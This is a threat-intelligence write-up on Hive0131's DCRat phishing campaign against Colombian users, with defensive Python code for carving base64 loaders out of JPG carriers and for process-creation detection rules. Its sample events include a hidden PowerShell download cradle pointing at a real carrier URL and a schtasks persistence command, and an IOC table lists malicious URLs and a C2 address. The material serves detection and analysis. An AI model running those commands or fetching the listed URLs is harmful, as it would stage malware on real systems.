IBM X-Force researchers identified a wave of targeted phishing campaigns in Colombia delivering DCRat, a remote access trojan, behind the guise of court notifications.
Attributed to the threat actor group Hive0131, these attacks use fraudulent electronic notifications purporting to originate from the Judiciary of Colombia (Rama Judicial de Colombia).
The operation primarily seeks to harvest banking credentials and other sensitive user data from victims in the Latin American (LATAM) region, and relies on a multi-stage delivery chain built around in-memory execution and sandbox evasion.

Hive0131, a financially motivated group likely originating from South America, has a history of running widespread commodity malware campaigns across LATAM.
The recent activity marks a shift in tactics: phishing emails now carry either embedded links or PDF lures to start the infection chain.
Once a link is clicked, the infection proceeds through a multi-stage process designed to evade detection and ultimately run DCRat entirely in memory.
Technical Analysis of the Attack Chain
Two primary infection vectors were observed. The first involves phishing emails containing PDFs with embedded TinyURL links.
These redirect victims to a ZIP archive named to mimic an official judicial notification. The archive contains a benign file alongside a malicious JavaScript (.js) component, which downloads a secondary payload from a paste[.]ee URL.
That payload launches a PowerShell command that downloads and executes a JPEG file from archive[.]org. The JPEG is a carrier: it contains a base64-encoded, obfuscated .NET loader dubbed VMDetectLoader, which, once run, retrieves and executes DCRat in memory.
The alternative infection vector uses Google Docs links to download password-protected ZIP archives. These contain batch file downloaders that execute obfuscated VBScript (VBS) files.

The VBS scripts decode and launch PowerShell, which downloads a JPG file acting as a carrier for the base64-encoded VMDetectLoader. The loader then deploys DCRat using process injection.
VMDetectLoader distinguishes itself through robust anti-analysis capabilities, including virtual machine and sandbox detection, string obfuscation, and dynamic payload decryption.
It establishes persistence by creating scheduled tasks or registry keys, and uses process hollowing to inject DCRat into legitimate Windows processes (notably MSBuild.exe).
The loader's code is based on the open-source VMDetector project, with custom additions for stealth and flexibility.
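The carrier technique above (an image file that is really just a wrapper around a base64-encoded .NET loader) is straightforward to triage offline. The following is an added example, not code from the IBM X-Force report or from the campaign; it assumes the loader sits in the image as a contiguous base64 run (the report does not describe the exact layout, so the scanner looks for any long base64 run rather than a fixed offset or marker) and validates each candidate by checking for a DOS `MZ` header whose `e_lfanew` field points at a `PE\0\0` signature. The sample carrier embedded below is constructed for the demonstration and contains a minimal fake PE header, not a real executable.

```python
"""Carve a base64-encoded PE image out of a JPG 'carrier' file."""
import base64
import re
import struct
from typing import Optional

# A run of base64 alphabet characters at least 64 long, with optional '=' padding.
# 64 chars (48 decoded bytes) is too short to be a PE, but it keeps the scan cheap
# and lets looks_like_pe() do the real filtering.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{64,}={0,2}")


def looks_like_pe(blob: bytes) -> bool:
    """True if blob starts with an MZ header whose e_lfanew points at 'PE\\0\\0'."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]   # offset of the PE signature
    return blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def extract_embedded_pe(carrier: bytes) -> Optional[bytes]:
    """Return the first base64 run in the carrier that decodes to a PE, else None."""
    for match in B64_RUN.finditer(carrier):
        try:
            decoded = base64.b64decode(match.group(0), validate=True)
        except ValueError:          # binascii.Error is a ValueError: bad length/padding
            continue
        if looks_like_pe(decoded):
            return decoded
    return None


def _fake_pe() -> bytes:
    """Constructed stand-in for a loader: MZ header, e_lfanew=0x40, PE signature."""
    dos_header = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", 0x40)
    return dos_header + b"PE\x00\x00" + b"\x00" * 20


# Constructed sample carrier: JPEG SOI/APP0 markers, filler standing in for image
# data, the EOI marker, then the base64 loader appended after the image proper.
SAMPLE_CARRIER = (
    b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01"
    + b"\x00\x10\xff\xda" * 64
    + b"\xff\xd9"
    + base64.b64encode(_fake_pe())
)


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_CARRIER
    pe = extract_embedded_pe(data)
    if pe is None:
        print("no embedded PE found")
    else:
        print(f"embedded PE found: {len(pe)} bytes, header {pe[:2]!r}")
```

Run it against a suspect JPG (`python carve.py new_image.jpg`) and write the returned bytes to disk for static analysis; if nothing is found, the loader may be stored with a transformation (reversed, character-substituted, or split around a marker string), which this scanner does not attempt.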
DCRat Malware-as-a-Service (MaaS) Operations
DCRat, active since at least 2018 and sold cheaply on Russian cybercrime forums, operates as a Malware-as-a-Service (MaaS) and has gained popularity among LATAM threat actors since 2024.
Its plugin-based architecture lets operators extend its capabilities, including system information theft, file manipulation, keystroke logging, and audio/video recording.
Notably, it can bypass Windows AMSI, evade analysis, terminate security processes, and maintain persistence.
Once executed, DCRat maintains communication with remote C2 infrastructure, receiving operator commands and exfiltrating harvested data.
Configuration analysis of recent samples revealed command servers hosted on dynamic DNS domains and C2 traffic protected with AES-CBC encryption and HMAC-SHA256 authentication.
Process injection and memory-only execution make detection and remediation challenging.
This campaign exemplifies the evolving threat landscape targeting Latin American banking users through sophisticated phishing and malware deployment.
While Hive0131 previously favored remote access trojans such as QuasarRAT and NjRAT, the uptick in DCRat deployment highlights the adaptability of financially motivated attackers.
According to the report, IBM X-Force expects ongoing and varied infiltration attempts, with banking credentials and sensitive user information remaining prime targets.
Organizations in LATAM are advised to treat unsolicited emails and attachments with caution, monitor for evidence of process injection (for example, MSBuild.exe launched without a project file) and persistence mechanisms such as new scheduled tasks or run keys, and ensure endpoint protection is fully updated and configured to detect these behaviors.
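The chain described above (script host launching PowerShell, PowerShell fetching an image carrier from a public host, MSBuild.exe started with no project to build, then scheduled-task persistence) can be expressed as a few process-creation rules. The block below is an added example, not code or detection content from the IBM X-Force report; it assumes Sysmon-style event fields (`Image`, `ParentImage`, `CommandLine`, `ProcessId`) and assumes the parent-child relationships implied by the write-up (the .js stage runs under wscript.exe, the hollowed MSBuild.exe is spawned by the PowerShell process that loaded VMDetectLoader). The events it runs over are constructed for the demonstration, not real telemetry; the archive.org URL in them is taken from the IOC table.

```python
"""Process-creation rules for the Hive0131 / DCRat execution chain."""
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Public hosting used for staging in this campaign (from the IOC table).
STAGING_HOSTS = ("archive.org", "paste.ee")
IMAGE_URL = re.compile(r"https?://[^\s'\"]+\.(?:jpe?g|png)\b")
PROJECT_FILE = re.compile(r"\.(?:csproj|vbproj|proj|sln)\b")


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(event: dict) -> list:
    """Return the names of every rule this event trips (empty list if none)."""
    image, parent = basename(event["Image"]), basename(event["ParentImage"])
    cmd = event["CommandLine"].lower()
    hits = []
    # JS dropper stage: a Windows script host launching PowerShell.
    if image in POWERSHELL and parent in SCRIPT_HOSTS:
        hits.append("script_host_spawns_powershell")
    # Carrier download: PowerShell fetching an image file from a staging host.
    if image in POWERSHELL and IMAGE_URL.search(cmd) and any(h in cmd for h in STAGING_HOSTS):
        hits.append("powershell_fetches_image_carrier")
    # Hollowing candidate: MSBuild.exe started by PowerShell with nothing to build.
    if image == "msbuild.exe" and parent in POWERSHELL and not PROJECT_FILE.search(cmd):
        hits.append("msbuild_without_project")
    # Persistence: schtasks /create from a PowerShell or MSBuild parent.
    if image == "schtasks.exe" and "/create" in cmd and parent in POWERSHELL | {"msbuild.exe"}:
        hits.append("scheduled_task_from_suspicious_parent")
    return hits


def run_detections(events) -> list:
    """(ProcessId, rule) pairs for every hit across the event stream."""
    return [(ev["ProcessId"], rule) for ev in events for rule in evaluate(ev)]


# Constructed events mirroring the chain; paths, PIDs and file names are made up.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
MSBUILD = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'wscript.exe "C:\Users\u\Downloads\notificacion.js"'},
    {"ProcessId": 4188, "Image": PS, "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": "powershell.exe -w hidden -ep bypass -c \"$u='https://archive.org/download/new_ABBAS/new_ABBAS.jpg';"
                    "$d=(New-Object Net.WebClient).DownloadString($u)\""},
    {"ProcessId": 4260, "Image": MSBUILD, "ParentImage": PS, "CommandLine": MSBUILD},
    {"ProcessId": 4300, "Image": r"C:\Windows\System32\schtasks.exe", "ParentImage": MSBUILD,
     "CommandLine": r"schtasks.exe /create /sc minute /mo 1 /tn Updater /tr C:\Users\u\AppData\Roaming\svc.exe /f"},
    # Benign controls: interactive PowerShell, and MSBuild given a real project.
    {"ProcessId": 5000, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe Get-ChildItem"},
    {"ProcessId": 5010, "Image": MSBUILD, "ParentImage": PS,
     "CommandLine": r"MSBuild.exe C:\src\App\App.csproj /t:Build"},
]


if __name__ == "__main__":
    for pid, rule in run_detections(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
```

The MSBuild rule deliberately keys on the absence of a project or solution argument rather than on MSBuild.exe itself, since build agents and Visual Studio spawn it constantly; the scheduled-task rule is scoped to the parents this chain uses so that ordinary administrative `schtasks` use is not flagged.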
Indicators of Compromise (IOC)
Hashes are reproduced as published: only the first two are full 64-character SHA256 values; the remaining four are shorter (40 hex characters, the length of a SHA1, or truncated) and are typed accordingly so they are not matched as SHA256.

| Indicator | Type | Context |
|---|---|---|
| 1603c606d62e7794da09c51ca7f321bb5550449165b4fe81153020021cbce140 | SHA256 | DCRat payload |
| 0df13fd42fb4a4374981474ea87895a3830eddcc7f3bd494e76acd604c4004f7 | SHA256 | Obfuscated .NET loader (VMDetectLoader) |
| 4ce1d456fa8831733ac01c4a2a32044b6581664d3 | Hash, 41 hex characters as published (truncated or garbled) | Carrier file (JPG) |
| 6a632d8356f42694adb21c064aa9e8710b65addd | Hash, 40 hex characters (SHA1 length) | ZIP archive |
| fdf2209d293ded12fe3d46a7 | Hash, 24 hex characters (truncated as published) | ZIP archive |
| ceb88c09069b5ddc8ca525b7f2e26c4852465bc0 | Hash, 40 hex characters (SHA1 length) | JavaScript payload |
| hxxps://tinyurl[.]com/2ypy4jrz?id=5541213d-0ed8-4516-82e7-5460d4ebaf3b | URL | Link embedded in PDF lure |
| hxxp://paste[.]ee/d/bx699sF9/0 | URL | Second-stage download fetched by the .js component |
| hxxps://docs[.]google[.]com/uc?export=download&id=1aJuQtm8YUqZv12E-atslt_GvBWZNbWIK | URL | Link embedded in email (password-protected ZIP) |
| hxxps://archive[.]org/download/new_ABBAS/new_ABBAS.jpg | URL | JPG carrier download |
| hxxps://ia601205.us.archive[.]org/26/items/new_image_20250430/new_image.jpg | URL | JPG carrier download |
| feb18[.]freeddns[.]org:8848 | C2 address (host:port) | DCRat command and control server (dynamic DNS) |